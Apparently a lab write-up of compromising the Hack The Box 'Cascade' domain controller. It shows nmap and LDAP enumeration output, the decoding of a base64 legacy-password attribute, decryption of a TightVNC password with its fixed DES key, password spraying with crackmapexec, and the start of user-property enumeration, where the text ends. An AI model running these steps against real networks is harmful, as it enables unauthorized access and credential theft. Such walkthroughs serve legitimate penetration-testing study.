so we begin by doing our nmap scan of the machine and we get:

# Nmap 7.94 scan initiated Sun Jul 30 12:53:30 2023 as: nmap -p53,88,135,139,389,445,636,49154,49155,49157,49158 -Pn -sC -sV -oA cascade 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.29s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-07-30 09:53:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-07-30T09:54:42
|_  start_date: 2023-07-30T09:13:04
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
|_clock-skew: 10s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 30 12:55:12 2023 -- 1 IP address (1 host up) scanned in 102.82 seconds


we try to authenticate using smb but we get our access is not allowed

so we can enumerate ldap using windapsearch.py:



[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.182
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=cascade,DC=local
[+] Attempting bind
[+]     ...success! Binded as: 
[+]      None

[+] Enumerating all AD users
[+]     Found 15 users: 

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: CascGuest
description: Built-in account for guest access to the computer/domain
distinguishedName: CN=CascGuest,CN=Users,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109153140.0Z
whenChanged: 20200110160637.0Z
uSNCreated: 8197
memberOf: CN=Guests,CN=Builtin,DC=cascade,DC=local
uSNChanged: 45094
name: CascGuest
objectGUID: LrFX+qgBukGjmV+ZFABrZw==
userAccountControl: 66082
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 0
primaryGroupID: 514
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJF9QEAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: CascGuest
sAMAccountType: 805306368
userPrincipalName: CascGuest@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200109175934.0Z
dSCorePropagationData: 20200109154857.0Z
dSCorePropagationData: 16010714223649.0Z
lastLogonTimestamp: 132230700642958462

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: ArkSvc
distinguishedName: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109161820.0Z
whenChanged: 20200323113833.0Z
displayName: ArkSvc
uSNCreated: 12799
memberOf: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=AD Recycle Bin,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295021
name: ArkSvc
objectGUID: ELXj5FhFXUmr2tAqpnaTNA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 132248055409887841
pwdLastSet: 132230603002172876
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFUgQAAA==
accountExpires: 9223372036854775807
logonCount: 13
sAMAccountName: arksvc
sAMAccountType: 805306368
userPrincipalName: arksvc@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163635.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 16010101000417.0Z
lastLogonTimestamp: 132294371134322815

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Steve Smith
sn: Smith
givenName: Steve
distinguishedName: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109180813.0Z
whenChanged: 20200323113113.0Z
displayName: Steve Smith
uSNCreated: 16404
memberOf: CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295015
name: Steve Smith
objectGUID: 39nrOPfEAE2an/UDQy/6fQ==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247275952778272
lastLogoff: 0
lastLogon: 132247275990842339
scriptPath: MapAuditDrive.vbs
pwdLastSet: 132247150854857364
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFUwQAAA==
accountExpires: 9223372036854775807
logonCount: 16
sAMAccountName: s.smith
sAMAccountType: 805306368
userPrincipalName: s.smith@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200109180813.0Z
dSCorePropagationData: 16010101000417.0Z
lastLogonTimestamp: 132294366735115088

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Util
distinguishedName: CN=Util,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109194521.0Z
whenChanged: 20200128180947.0Z
displayName: Util
uSNCreated: 24650
uSNChanged: 245850
name: Util
objectGUID: GdAgZzaP8E6S7CzuIP8sag==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 132247085871071226
pwdLastSet: 132233548311955855
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVwQAAA==
accountExpires: 9223372036854775807
logonCount: 1
sAMAccountName: util
sAMAccountType: 805306368
userPrincipalName: util@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163635.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 16010101000417.0Z
lastLogonTimestamp: 132247085871071226

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: James Wakefield
sn: Wakefield
givenName: James
distinguishedName: CN=James Wakefield,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109203444.0Z
whenChanged: 20200115215201.0Z
displayName: James Wakefield
uSNCreated: 28741
uSNChanged: 118849
name: James Wakefield
objectGUID: 6SX/H/Sf5UOkC8IjbIii7A==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132230756844150124
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFXAQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: j.wakefield
sAMAccountType: 805306368
userPrincipalName: j.wakefield@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200109203444.0Z
dSCorePropagationData: 16010101000417.0Z

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Stephanie Hickson
sn: Hickson
givenName: Stephanie
distinguishedName: CN=Stephanie Hickson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113012427.0Z
whenChanged: 20200115215221.0Z
displayName: Stephanie Hickson
uSNCreated: 65594
memberOf: CN=HR,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 118853
name: Stephanie Hickson
objectGUID: rCGbAiT7r0CiOzKwLPa8NQ==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132233522678003963
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFYQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: s.hickson
sAMAccountType: 805306368
userPrincipalName: s.hickson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113012427.0Z
dSCorePropagationData: 16010101000417.0Z

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: John Goodhand
sn: Goodhand
givenName: John
distinguishedName: CN=John Goodhand,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113014026.0Z
whenChanged: 20200115215154.0Z
displayName: John Goodhand
uSNCreated: 65614
uSNChanged: 118848
name: John Goodhand
objectGUID: 7TACWgpE/kqlMHRot3JgpQ==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132233532260320793
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFYgQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: j.goodhand
sAMAccountType: 805306368
userPrincipalName: j.goodhand@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113014026.0Z
dSCorePropagationData: 16010101000417.0Z

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Adrian Turnbull
sn: Turnbull
givenName: Adrian
distinguishedName: CN=Adrian Turnbull,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113014313.0Z
whenChanged: 20200113034534.0Z
displayName: Adrian Turnbull
uSNCreated: 65635
uSNChanged: 94281
name: Adrian Turnbull
objectGUID: PkhsX7HK0UKVFdwqFTWrnQ==
userAccountControl: 66080
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132233533933579732
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFZAQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: a.turnbull
sAMAccountType: 805306368
userPrincipalName: a.turnbull@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113015223.0Z
dSCorePropagationData: 16030216172521.0Z
msDS-SupportedEncryptionTypes: 0

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Edward Crowe
sn: Crowe
givenName: Edward
distinguishedName: CN=Edward Crowe,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113034502.0Z
whenChanged: 20200128180707.0Z
displayName: Edward Crowe
uSNCreated: 94274
uSNChanged: 245840
name: Edward Crowe
objectGUID: spB7cioaike11C+BNt/oVg==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132233607021669462
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFZwQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: e.crowe
sAMAccountType: 805306368
userPrincipalName: e.crowe@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113034502.0Z
dSCorePropagationData: 16010101000417.0Z

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ben Hanson
sn: Hanson
givenName: Ben
distinguishedName: CN=Ben Hanson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113163539.0Z
whenChanged: 20200128180729.0Z
displayName: Ben Hanson
uSNCreated: 114734
uSNChanged: 245841
name: Ben Hanson
objectGUID: aiS9+OrNYE6UJnr8wuBpHg==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132234069391538655
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFaAQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: b.hanson
sAMAccountType: 805306368
userPrincipalName: b.hanson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113163539.0Z
dSCorePropagationData: 16010101000417.0Z

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: David Burman
sn: Burman
givenName: David
distinguishedName: CN=David Burman,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113163612.0Z
whenChanged: 20200115215216.0Z
displayName: David Burman
uSNCreated: 114742
uSNChanged: 118852
name: David Burman
objectGUID: UqmXwgkl/0iy14P121+N7A==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132234069729591249
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFaQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: d.burman
sAMAccountType: 805306368
userPrincipalName: d.burman@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113163613.0Z
dSCorePropagationData: 16010101000417.0Z

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: BackupSvc
givenName: BackupSvc
distinguishedName: CN=BackupSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113163703.0Z
whenChanged: 20200113163732.0Z
displayName: BackupSvc
uSNCreated: 114757
uSNChanged: 114765
name: BackupSvc
objectGUID: /AeVxvZYJ0S4xu2RXKx+KA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132234070231912131
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFagQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: BackupSvc
sAMAccountType: 805306368
userPrincipalName: BackupSvc@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163703.0Z
dSCorePropagationData: 16010101000417.0Z

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Joseph Allen
sn: Allen
givenName: Joseph
distinguishedName: CN=Joseph Allen,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113172359.0Z
whenChanged: 20200115215149.0Z
displayName: Joseph Allen
uSNCreated: 114807
uSNChanged: 118847
name: Joseph Allen
objectGUID: HEPoVWJubkGd3J25ACGaRA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132234098399165604
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFbgQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: j.allen
sAMAccountType: 805306368
userPrincipalName: j.allen@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113172359.0Z
dSCorePropagationData: 16010101000417.0Z

objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ian Croft
sn: Croft
givenName: Ian
distinguishedName: CN=Ian Croft,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200115214621.0Z
whenChanged: 20200128180700.0Z
displayName: Ian Croft
uSNCreated: 118835
uSNChanged: 245839
name: Ian Croft
objectGUID: nRdObhMYfkOzzZt2y5gHxw==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132235983818652005
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFbwQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: i.croft
sAMAccountType: 805306368
userPrincipalName: i.croft@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200115214621.0Z
dSCorePropagationData: 16010101000417.0Z


[*] Bye!

so after using windapsearch to enumerate ldap and check for users in the domain we see many users... checking over there using the windap command 

./windapsearch.py -U --full --dc-ip 10.10.10.182

on checking the users names... and user attributes we find a unique attribute that is cascadeLegacyPwd... the unique attribute contains a base64 encoded string:

clk0bjVldmE=

so we decode it using echo "clk0bjVldmE="| base64 -d 

and we get rY4n5eva as the  output... well I suspect this might be a password of the user  r.thompson... we know its for r.thompson as that is the SAMAccountname that is associated with the user... attribute

so we use enum4linux to do the enumeration for us then if we get nothing we begin manual enumeration 

and we get users:

administrator
CascGuest
krbtgt
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft

the so using smbmap we do a recursive listing and we find out that we have access to the IT share in the Data share... soo we enumerate and download theb files available in those shares... 

smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva -d cascade.local -R Data --depth 1
[+] IP: 10.10.10.182:445        Name: cascade.local                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Data                                                    READ ONLY
        .\Data\*
        dr--r--r--                0 Wed Jan 29 01:05:51 2020    .
        dr--r--r--                0 Wed Jan 29 01:05:51 2020    ..
        dr--r--r--                0 Mon Jan 13 04:45:14 2020    Contractors
        dr--r--r--                0 Mon Jan 13 04:45:10 2020    Finance
        dr--r--r--                0 Tue Jan 28 21:04:51 2020    IT
        dr--r--r--                0 Mon Jan 13 04:45:20 2020    Production
        dr--r--r--                0 Mon Jan 13 04:45:16 2020    Temps
        .\Data\IT\*
        dr--r--r--                0 Tue Jan 28 21:04:51 2020    .
        dr--r--r--                0 Tue Jan 28 21:04:51 2020    ..
        dr--r--r--                0 Tue Jan 28 21:00:30 2020    Email Archives
        dr--r--r--                0 Tue Jan 28 21:04:51 2020    LogonAudit
        dr--r--r--                0 Wed Jan 29 03:53:04 2020    Logs
        dr--r--r--                0 Wed Jan 29 01:06:59 2020    Temp


we download the 'VN Install.reg' file, 'ArkAdRecycleBin.log', 'dc diag.log' and some meeting minutes that state that the password of the TempAdmin account is the same as the default admin account creds... and when we check the ArkAdRecycleBin.log we see that the account TempAdmin was moved into the recycle bin and in the Temp share we see two user share... s.smith and r.thompson... s.smith is empty so we check r.thompson and when we check we find out that there is a 'VNC Install.reg' file and looks like it contains a password inside... its hex encoded... lets look up online how to decode the TightVNC password that is encoded....


checking online we find that using xxd,openssl and hexdump we are able to retrive the password as sT333ve2

echo -n hex:6b,cf,2a,4b,6e,5a,ca,0f  | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
00000000  73 54 33 33 33 76 65 32                           |sT333ve2|
00000008


    echo -n hex:6b,cf,2a,4b,6e,5a,ca,0f: This command echoes the input string hex:6b,cf,2a,4b,6e,5a,ca,0f to the standard output without adding a newline at the end (thanks to the -n option).

    | xxd -r -p: The pipe | takes the output of the previous command and passes it as input to the next command. Here, the output is piped to xxd, a utility that can convert between hex and binary. The -r option tells xxd to reverse the operation (convert from hex to binary), and -p specifies that the input is in plain hex format.

    | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d: The output of the previous command (binary data) is passed through the pipe to openssl enc. The enc command is used for symmetric encryption and decryption.
        --des-cbc: Specifies the DES cipher in CBC (Cipher Block Chaining) mode.
        --nopad: Instructs OpenSSL not to use padding during encryption/decryption.
        --nosalt: Disables the use of salt during encryption/decryption (not recommended for real-world scenarios).
        -K e84ad660c4721ae0: Specifies the encryption key in hexadecimal format.
        -iv 0000000000000000: Specifies the initialization vector (IV) in hexadecimal format.

    The decryption (-d) mode is used to reverse the encryption process.

    | hexdump -Cv: The output of the previous openssl command is piped to hexdump, which is a utility to display binary data in various formats. -C enables the hexadecimal and ASCII output format, and -v makes it show all input data.


 so the password sT333ve2 might be for the user... s.smith 

 checking with crackmapexec for winrm authentication we see that s.smith is the user who we can authenticate with through winrm

 crackmapexec winrm  10.10.10.182 -u users.txt -p sT333ve2 --continue-on-success
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\administrator:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\CascGuest:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\krbtgt:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\arksvc:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\r.thompson:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\util:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\j.wakefield:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\s.hickson:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\j.goodhand:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\a.turnbull:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\e.crowe:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\b.hanson:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\d.burman:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\BackupSvc:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\j.allen:sT333ve2
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\i.croft:sT333ve2

and also smb:

crackmapexec smb  10.10.10.182 -u users.txt -p sT333ve2 --continue-on-success
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\administrator:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\CascGuest:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\krbtgt:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\arksvc:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\s.smith:sT333ve2 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\r.thompson:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\util:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\j.wakefield:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\s.hickson:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\j.goodhand:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\a.turnbull:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\e.crowe:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\b.hanson:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\d.burman:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\BackupSvc:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\j.allen:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\i.croft:sT333ve2 STATUS_LOGON_FAILURE

for smb access we see that we have the same access as the user r.thompson... so we will just authenticate throgh winrm.

for lateral movement we check the users properties... using
Get-ADUser -identity s.smith -properties *

so we get all the properties of this user and the properties are:

AccountExpirationDate              :
accountExpires                     : 9223372036854775807
AccountLockoutTime                 :
AccountNotDelegated                : False
AllowReversiblePasswordEncryption  : False
BadLogonCount                      : 1
badPasswordTime                    : 133351885832466040
badPwdCount                        : 1
CannotChangePassword               : True
CanonicalName                      : cascade.local/UK/Users/Steve Smith
Certificates                       : {}
City                               :
CN                                 : Steve Smith
codePage                           : 0
Company                            :
Country                            :
countryCode                        : 0
Created                            : 1/9/2020 6:08:13 PM
createTimeStamp                    : 1/9/2020 6:08:13 PM
Deleted                            :
Department                         :
Description                        :
DisplayName                        : Steve Smith
DistinguishedName                  : CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
Division                           :
DoesNotRequirePreAuth              : False
dSCorePropagationData              : {1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM, 1/13/2020 4:36:28 PM, 1/9/2020 6:08:13 PM...}
EmailAddress                       :
EmployeeID                         :
EmployeeNumber                     :
Enabled                            : True
Fax                                :
GivenName                          : Steve
HomeDirectory                      :
HomedirRequired                    : False
HomeDrive                          :
HomePage                           :
HomePhone                          :
Initials                           :
instanceType                       : 4
isDeleted                          :
LastBadPasswordAttempt             : 7/30/2023 12:03:03 PM
LastKnownParent                    :
lastLogoff                         : 0
lastLogon                          : 132247275990842339
LastLogonDate                      : 7/30/2023 12:42:59 PM
lastLogonTimestamp                 : 133351909791456121
LockedOut                          : False
logonCount                         : 16
LogonWorkstations                  :
